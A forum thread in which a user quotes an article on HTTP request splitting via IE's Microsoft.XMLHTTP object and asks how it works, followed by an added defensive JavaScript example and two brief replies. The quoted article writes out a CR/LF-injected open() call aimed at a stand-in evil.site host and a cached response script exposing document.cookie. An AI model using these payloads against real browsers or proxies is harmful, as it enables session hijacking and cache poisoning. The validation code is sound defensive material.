  1. #1 abalfazl

    HTTP Request splitting

    Hello

    A Request Splitting attack abuses flaws in asynchronous requests and allows arbitrary headers to be injected when an HTTP request is built. The attack in the following examples is accomplished using IE's ActiveX object 'Microsoft.XMLHTTP', but there are unfixed objects in other browsers that permit it too. Let's make an example:
    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.open("GET\thttp://www.evil.site/2.html\tHTTP/1.1\r\nHost:\twww.evil.site\r\nProxy-Connection:\tKeep-Alive\r\n\r\nGET", "/3.html", false);
    x.send();
    A JavaScript request forged as in the previous code will send the following requests:
    GET http://www.evil.site/2.html HTTP/1.1
    Host: www.evil.site
    Proxy-Connection:Keep-Alive
    GET /3.html HTTP/1.1
    Host: www.evil.site
    Proxy-Connection:Keep-Alive

    If there is a web proxy in the middle of the communication, it will see two requests asking for two pages at http://www.evil.com. As explained in figure 3, the proxy will send the two requests and will get two responses:
    Response 1: http://www.evil.site/2.html:
    <html> <body> foo </body> </html>
    Response 1_2: http://www.evil.site/3.html:
    <html> <head> <meta http-equiv="Expires" content="Wed, 01 Jan 2020 00:00:00 GMT">
    <meta http-equiv="Cache-Control" content="public">
    <meta http-equiv="Last-Modified" content="Fri, 01 Jan 2010 00:00:00 GMT">
    </head> <body>
    <script>
    alert("DEFACEMENT and XSS: your cookie is"+document.cookie)
    </script>
    </body>
    </html>
    From the browser's point of view, only request 1 has been sent, so Response 1_2 is simply put into the browser queue waiting to be associated with the next request.

    The next step is to open a new window via JavaScript with any host address (e.g. http://www.bank.com) and the browser will queue Response 1_2 instead of the original page.
    Auto Injecting Cross Domain Scripting
    A new attack technique will be presented which takes advantage of HTTP request-splitting or request smuggling vulnerabilities and frame injection vectors. As a result of this attack a malicious user could inject a particular snippet of JavaScript code into any page of any domain to take control over the user's browsing sessions.


    I don't get how this attack works. Can someone explain it? Response 1_2 is simply put into the browser queue waiting to be associated with the next request, but how does a hacker use that?
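As an added example (not code from the post, from the quoted article, or from any browser vendor), the following JavaScript shows what an intermediary parses when a method string like the one above is pasted unchecked into a request head, beside the token check that a hardened open() applies. All function names are assumptions for illustration.

```javascript
// Added example: why a CR/LF-bearing method string turns into two requests
// on the wire, and the validation that refuses it. Names are hypothetical.

// RFC 7230 "token" grammar: what a legitimate HTTP method must match.
const TOKEN = /^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$/;

// Naive builder: pastes caller-controlled method and URL straight into the
// request head, the kind of unchecked concatenation the post's example abuses.
function buildRequestNaive(method, url, host) {
  return `${method} ${url} HTTP/1.1\r\nHost: ${host}\r\n\r\n`;
}

// Hardened builder: the method must be a single token, and neither the URL
// nor the Host value may carry CR, LF or whitespace, so no extra header or
// request boundary can be smuggled in. Modern XMLHttpRequest.open() applies
// the same kind of validation and throws SyntaxError.
function buildRequestStrict(method, url, host) {
  if (!TOKEN.test(method)) throw new SyntaxError("invalid HTTP method");
  if (/[\r\n\s]/.test(url)) throw new SyntaxError("invalid request URL");
  if (/[\r\n\s]/.test(host)) throw new SyntaxError("invalid Host value");
  return `${method} ${url} HTTP/1.1\r\nHost: ${host}\r\n\r\n`;
}

// Proxy's view of the wire: every blank-line-terminated head is one request.
// Returns the request line of each head found in the byte stream.
function requestLines(wire) {
  return wire
    .split("\r\n\r\n")
    .filter((head) => head.length > 0)
    .map((head) => head.split("\r\n")[0]);
}

// Constructed method string with the same shape as the one quoted in the post.
const forgedMethod =
  "GET\thttp://www.evil.site/2.html\tHTTP/1.1\r\nHost:\twww.evil.site" +
  "\r\nProxy-Connection:\tKeep-Alive\r\n\r\nGET";

// Naive: the proxy sees two request lines. Strict: the forged method is refused.
console.log(requestLines(buildRequestNaive(forgedMethod, "/3.html", "www.evil.site")));
try {
  buildRequestStrict(forgedMethod, "/3.html", "www.evil.site");
} catch (e) {
  console.log(`rejected: ${e.message}`);
}
```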

  2. #2 paul_wilkins
    The attack works by forcing two pages to come through instead of just the one.

    When a new window is opened, you will see not what is supposed to be there, but instead the second page from the bad site.

  3. #3 logic_earth
    Alright I don't mean to come off mean or rude, but you seriously need to stop and learn the basics. You are way over your head way over.